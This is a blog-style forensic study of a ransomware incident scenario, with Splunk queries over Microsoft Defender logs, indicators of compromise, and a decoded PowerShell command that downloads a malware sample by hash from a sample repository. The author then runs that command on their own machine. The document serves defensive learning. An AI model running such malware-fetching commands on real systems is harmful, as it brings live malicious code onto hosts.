Studying “BazarCall to Conti Ransomware via Trickbot and Cobalt Strike”: Part 1

Salim Salimov
9 min read · Mar 17, 2024

Digging into Microsoft Defender Endpoint log files with Splunk.

Hello Medium users, I hope you are all doing well.

Today I am starting a mini-series of study blogs about a ransomware attack that occurred in 2021, which I learned about from TheDFIRreport website, where you can check it out as well.

I have also been provided with a good collection of post-incident data for analysis: MDE log files, VHDX disk image files taken with KAPE, volatile memory dump files and a bunch of pcap files. All this data was collected from 4 machines in the compromised company network.

The MDE logs are in CSV format.

1. Preparing Data in Splunk:

I have uploaded all 4 available CSV log files together to Splunk under the same index, created specially for them.

This way, instead of source=“<example>”, my search queries can start with index=“csv_files” to search for events in all 4 logs together. For a more detailed guide on how to upload log files to Splunk, please check out one of my previous blogs here.

2. Before I start searching for any malicious activities I would like to know a few things about the company's local network.

To list all computers on the local network I simply searched for index=”csv_files”, which loads all the events from the uploaded log files.

Then in Splunk's fields panel I looked at the Computer Name field and found the names of 4 computers.

  • To find the list of all IPs in this local network I just scrolled a bit further down and checked the Local IP field.

Next I could start to search for malicious activities.

3. Analyzing Login Attempts:

  • I tried to find failed logon attempts:
index="csv_files" "Action Type"=LogonFail

or

index="csv_files" "Action Type"=LogonFailed

These queries didn't give me any results, and I couldn't see anything related in the interesting fields either.

  • Next I tried to look for successful logon attempts from suspicious sources, i.e. remote login attempts, for example use of Remote Desktop Protocol (RDP).

(As I am not very familiar with MDE logs yet, I use a Splunk cheatsheet for Sysmon EVTX logs and then try to find alternative queries adapted to MDE logs.)

index="csv_files" "Action Type"=LogonSuccess "Logon Type"=RemoteInteractive

This query returned a single result, which helped me find a compromised account name and some more information that I can refer back to later during my investigation.

  • Next I searched for other suspicious events with this account name:
index="csv_files" | search "Account Name"="a**********" "Action Type"=InteractiveRemoteComponentInvocation 

I could not spot much, apart from Splunk suggesting that these events could represent the T1078 (MITRE) / T1021.001 (MITRE) techniques, which are “Valid Accounts” and “Remote Services: Remote Desktop Protocol” (RDP connections) as described on the MITRE ATT&CK framework website.

  • Then I carried on with the following search query:
index="csv_files" "Action Type"=ConnectionFailed

(Screenshot: First Malicious IP)

As seen in the screenshot, among the top 10 Remote IP values there is only one IP that looks like an external public IP. The rest of the list seems to belong to another subnet in the company's private network. A quick check on VirusTotal shows that 10 vendors flagged this IP, located in Bulgaria, as malicious. I then decided to trace back the related activities as far as possible: whether there was any successful connection to this IP, and when it was first connected to successfully, with the following query:

index="csv_files" "Remote IP"="88.80.147.101" "Action Type"=ConnectionSuccess 
| reverse

The reverse here is used to put the events in chronological order so I can see the earliest event at the top of the results. In the first/top result we can see that the process “tdrE934.exe” initiated a connection to the remote IP address 88.80.147.101 on port 80 from the local IP address 10.100.100.22. The connection was established successfully. The account name used is “h**********”, and the event also gives additional details about the initiating process, such as its creation time, file name and folder path.

With some extra searching about this IP I also found that it is associated with the domain “gmbfrom.com”, with other suspicious files with similar names (“tdr615.exe”, “tdr2269.exe”, “tdr5BDD.exe”), and with some suspicious activity of the legitimate taskhostw.exe and explorer.exe, which have possibly been modified/abused. This needs more investigation.

4. Accounts:

Based on the findings from the searches above, it seems that “a**********” and “h**********” are the two main accounts the attackers have been using for their malicious activities in the company network.

5. Unusual Activity:

  • I wanted to see which of the above-mentioned accounts' activities are the most suspicious. I started by checking for any other suspicious remote IPs:
index="csv_files" a********** OR h********** "Remote IP"="*"

In the query above I gave the two account names and set the Remote IP to match anything. The “*” for the Remote IP value is a wildcard that matches any value, which Splunk's search language supports.

(Screenshot: Second Malicious IP)

I spotted a second malicious IP; according to VirusTotal it is detected as malicious and is related to Cobalt_strike.exe.

  • A note has been taken, and I’m moving on to the next query:
index="csv_files" 149.248.52.187 OR 88.80.147.101

Using this query I found another remote URL related to them, “onlineworkercz.com”, along with some other useful information on new processes and files that are also involved. All saved into my notes.

  • Continuing to search for the initial time and how the attackers got their foot inside the organization, I tried a few queries similar to the one below:
index="csv_files" a*********** OR h*********** | search "Action Type"=ImageLoaded "Initiating Process Command Line"="*\temp*"
| reverse

Attackers normally download/drop/execute their malware from unusual or hidden and temporary locations in the system. My aim with this query was to check whether such a tactic was used in this case too.

As a result I found three ImageLoaded events executed from the Temp folder of the “win81.lakestatebank.local” machine with the account name “h**********”:

a) The first event indicates that the user “h**********” executed the “regsvr32.exe” process, which loaded the DLL file “87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4.dll” located in the temporary directory “C:\Users\H**********\AppData\Local\Temp” into memory, with the parent process being “cmd.exe”.

b) The second event indicates that the user “h**********” executed the “regsvr32.exe” process, which loaded the DLL file “87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4.dll” located in the temporary directory “C:\Users\H**********\AppData\Local\Temp” into memory. The parent process of “regsvr32.exe” was another instance of “regsvr32.exe”.

c) The “esentutl.exe” process was created with a command line argument to perform a specific operation (“/p /o C:\Users\H***********\AppData\Local\Temp\grabber_temp.edb”). The parent process of “esentutl.exe” was “svchost.exe”.

6. Outbound Connections:

  • To investigate outbound connections to external IP addresses I used the query below:
index="csv_files" | search "Action Type"=OutboundConnectionToWebProtocol | top limit=20 "Remote IP"

With this query I looked at the Statistics tab and, as you can see, of the 19 outbound remote IP addresses most appear to be malicious according to VirusTotal.

In this table I have colour-coded malicious and clean IP addresses in red and green respectively.
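The same "top Remote IP" count done outside Splunk, as an added example that is not part of the original article: it parses a constructed MDE-style CSV (column names assumed to match the fields used in the queries above) and, going one step beyond the SPL, separates public addresses from RFC 1918 / non-routable ones, which is the by-eye check done earlier when picking out the single external IP.

```python
import csv
import io
import ipaddress
from collections import Counter

# Constructed sample rows in the shape of the MDE CSV export discussed above
# (column names are assumed; only the fields this example uses are included).
SAMPLE_CSV = """Action Type,Computer Name,Remote IP,Remote Port,Initiating Process File Name
OutboundConnectionToWebProtocol,win81.lakestatebank.local,88.80.147.101,80,tdrE934.exe
OutboundConnectionToWebProtocol,win81.lakestatebank.local,10.100.100.5,445,svchost.exe
OutboundConnectionToWebProtocol,win81.lakestatebank.local,88.80.147.101,80,tdrE934.exe
ConnectionSuccess,win81.lakestatebank.local,88.80.147.101,80,tdrE934.exe
OutboundConnectionToWebProtocol,win81.lakestatebank.local,149.248.52.187,443,powershell.exe
OutboundConnectionToWebProtocol,win81.lakestatebank.local,192.168.1.20,80,explorer.exe
"""


def is_public(ip: str) -> bool:
    """True for globally routable addresses; private, loopback, link-local
    and unparseable values count as internal/noise."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def top_remote_ips(csv_text: str, action: str = "OutboundConnectionToWebProtocol", limit: int = 20):
    """Equivalent of: search "Action Type"=<action> | top limit=<limit> "Remote IP"."""
    rows = csv.DictReader(io.StringIO(csv_text))
    counts = Counter(r["Remote IP"] for r in rows if r["Action Type"] == action)
    return counts.most_common(limit)


def external_candidates(csv_text: str):
    """Only the public remote IPs, with hit counts: the ones worth a reputation lookup."""
    return [(ip, n) for ip, n in top_remote_ips(csv_text) if is_public(ip)]


if __name__ == "__main__":
    for ip, n in top_remote_ips(SAMPLE_CSV):
        print(f"{ip:16} {n:3} {'external' if is_public(ip) else 'internal'}")
```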

7. A Brief Threat Hunting:

At this point I wanted to go back and dig a bit deeper into the newly found DLL file.

  • Search query with the filename:
index="csv_files"  87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4.dll | reverse

It seems there is no information about how it was created, but I have its hash, which is strangely the same as the filename. Checking on VirusTotal confirms that it is flagged as malicious by a huge number of vendors.

In one of my previous articles here I wrote that attackers often use PowerShell commands to download and execute malware, passing the command base64-encoded. This might be the reason why I cannot find where this file came from. To check my hypothesis I am going to include in a new search query some information from the event above, without the file name.

index="csv_files" "Action Type"=FileCreated AND
"Computer Name"="win81.lakestatebank.local" AND "powershell.exe" AND "EncodedCommand"
| reverse

Here I was looking for files created on this computer by powershell.exe running a command that includes EncodedCommand. As a result Splunk returned three events with base64 in the PowerShell command line.

What I did next was decode this base64 using CyberChef:

  • So I have a human-readable command line that was executed with PowerShell:
Invoke-WebRequest -Uri https://mb-api.abuse.ch/api/v1/ -Method POST -Body "query=get_file&sha256_hash=87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4" -outfile C:\users\1.zip

To my understanding this command line makes a POST request to the given URL to download a file by its hash (not by the file name, which explains why the file I found earlier has its hash as its filename), then saves it wrapped in a zip file to C:\users\1.zip.
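The CyberChef step above done in code, as an added example that is not part of the original article: PowerShell's -EncodedCommand value is base64 of the script in UTF-16LE, so a plain base64 decode gives interleaved null bytes. The sample command line is constructed here by encoding the decoded command the article recovered; the command-line shape (powershell.exe with -NoP -W Hidden) is an assumption.

```python
import base64
import re

# Constructed sample: the command recovered above, re-encoded the way powershell.exe expects.
DECODED_CMD = (
    'Invoke-WebRequest -Uri https://mb-api.abuse.ch/api/v1/ -Method POST '
    '-Body "query=get_file&sha256_hash='
    '87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4" '
    '-outfile C:\\users\\1.zip'
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(DECODED_CMD.encode("utf-16-le")).decode("ascii")
)


def decode_encoded_command(cmdline: str):
    """Return the decoded script from a powershell.exe command line, or None.
    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    so match on the prefix rather than on the full switch name."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[0] not in "-/":
            continue
        f = flag[1:].lower()
        if not (f == "ec" or (f.startswith("e") and "encodedcommand".startswith(f))):
            continue
        try:
            raw = base64.b64decode(value, validate=True)
            return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; keep scanning
    return None


def extract_indicators(script: str) -> dict:
    """Pull the URL, SHA-256 and output path out of a decoded download command."""
    return {
        "urls": re.findall(r"https?://[^\s\"']+", script),
        "sha256": re.findall(r"\b[0-9a-fA-F]{64}\b", script),
        "outfile": re.findall(r"(?i)-outfile\s+(\S+)", script),
    }


if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_CMDLINE)
    print(script)
    print(extract_indicators(script))
```

Running it over the Process Command Line field of the FileCreated events gives the same readable command as CyberChef, plus the hash to pivot on.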

  • To confirm this I copied this PowerShell command line, changed the download path to a folder on my desktop created specially for it, and ran the command on my machine.
A password-protected file, 1.zip, was downloaded to the given location.

With some quick research on the internet I found that the URL the malicious file was downloaded from belongs to a legitimate website that provides malware samples, and the samples come in compressed zip files with the password “infected”. Now I can use this password to extract the file and investigate further with other tools if needed. I can also check what the website provides as info about it:

(Screenshot: tags Bazaarcall, Trickbot)
  • After it was downloaded, the file seems to have been unzipped, moved, renamed and executed by other processes.

But the question of how this file came to this computer still remains. What initiated PowerShell to download this file?

  • I went back to the latest log to see what the parent process was.

As we can see its file name is Velociraptor.exe and the process ID is 1732. I am a step closer, but I still don't know how the attacker made their way into the company.

  • It seems I have run out of ideas on how to reach the initial access file using only MDE logs. It might be another PowerShell command line from a PowerShell script (.ps1); I have seen many of them in the logs but I'm not sure which one to dig into.

8. Document Findings

  • I put all findings in notes and created a table that I can use with other tools to investigate further.

Thanks to everyone for stopping by and reading my article; I hope you have enjoyed it. See you again soon in Part 2 of this mini-series.

Tools and resources used in this blog:

Linux Mint — my running OS

Splunk with Free License

Proxmox home lab, Windows 11 VM

Cheatsheet and artifacts provided by my mentors at Maltrak.com

Story preview image from: https://freerangestock.com/
